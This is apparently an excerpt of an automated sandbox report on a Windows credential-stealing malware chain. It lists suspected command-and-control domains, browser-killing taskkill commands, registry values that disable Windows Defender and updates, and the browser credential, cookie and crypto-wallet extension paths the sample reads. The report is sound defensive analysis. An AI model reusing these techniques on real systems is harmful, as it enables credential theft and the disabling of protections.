Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F80C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_00F80C21
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: ENORVNMU067PBMHUGECCERYC06W3ZY.exe PID: 5636, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7d61336cf8.exe PID: 1468, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe, type: DROPPED
Source: file.exe, 00000000.00000003.2147367014.0000000004B00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: clearancek.site
Source: file.exe, 00000000.00000003.2147367014.0000000004B00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: licendfilteo.site
Source: file.exe, 00000000.00000003.2147367014.0000000004B00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: spirittunek.store
Source: file.exe, 00000000.00000003.2147367014.0000000004B00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: bathdoomgaz.store
Source: file.exe, 00000000.00000003.2147367014.0000000004B00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: studennotediw.store
Source: file.exe, 00000000.00000003.2147367014.0000000004B00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: dissapoiznw.store
Source: file.exe, 00000000.00000003.2147367014.0000000004B00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: eaglepawnoy.store
Source: file.exe, 00000000.00000003.2147367014.0000000004B00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: mobbipenju.store
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FC1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 12_2_00FC1201
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FA2BA5 KiUserCallbackDispatcher,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 12_2_00FA2BA5
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FCB226 SendInput,keybd_event, 12_2_00FCB226
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FE22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 12_2_00FE22DA
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe "C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe "C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe "C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000995001\num.exe "C:\Users\user\AppData\Local\Temp\1000995001\num.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FC0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 12_2_00FC0B62
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FC1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 12_2_00FC1663
Source: d7c50276ff.exe, 0000000C.00000000.2619556994.0000000001022000.00000002.00000001.01000000.00000011.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: aae25c676b.exe, aae25c676b.exe, 00000009.00000002.2563481565.000000000104B000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: Program Manager
Source: d7c50276ff.exe Binary or memory string: Shell_TrayWnd
Source: OLR88CERN7VQFRQ38J.exe, OLR88CERN7VQFRQ38J.exe, 00000003.00000002.2405341861.0000000000327000.00000040.00000001.01000000.00000006.sdmp Binary or memory string: IsProgram Manager
Source: BF3BS0M5707K28RGW9.exe, BF3BS0M5707K28RGW9.exe, 00000006.00000002.2551307135.0000000000C0C000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: &Program Manager
Source: firefox.exe, 0000001A.00000002.2838376773.000000FE603FB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?Progman
Source: 7d61336cf8.exe, 0000000A.00000002.2635121999.0000000000E06000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: E&Program Manager
Source: 7d61336cf8.exe Binary or memory string: E&Program Manager
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F80698 cpuid 12_2_00F80698
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000995001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000995001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW, 12_2_00FD8195
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FBD27A GetUserNameW, 12_2_00FBD27A
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F9B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 12_2_00F9B952
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F642DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 12_2_00F642DE
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Registry value created: TamperProtection 0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations Jump to behavior
Source: file.exe, 00000000.00000003.2258303293.00000000055AC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2251184571.00000000055B1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2246554241.00000000055AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 3.2.OLR88CERN7VQFRQ38J.exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.skotes.exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000003.2411955466.0000000004930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2405168381.0000000000131000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2364843003.00000000047F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.2722993454.0000000004890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2764558562.0000000000131000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.2991405310.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d7c50276ff.exe PID: 6488, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 27.2.num.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.7d61336cf8.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.0.num.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.num.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.num.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.7d61336cf8.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.ENORVNMU067PBMHUGECCERYC06W3ZY.exe.4d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000000.2667130005.00000000009E1000.00000080.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.2760497126.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2926562320.0000000001187000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.2909397637.00000000009E1000.00000080.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2687324655.00000000009E1000.00000080.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2591227334.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2924335248.00000000009E1000.00000080.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2688771618.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2493072660.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2404591407.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2635976470.000000000173E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2807278591.0000000000A21000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2634884064.0000000000A21000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2806511011.000000000082B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2492114993.00000000004D1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ENORVNMU067PBMHUGECCERYC06W3ZY.exe PID: 5636, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7d61336cf8.exe PID: 1468, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite Jump to behavior
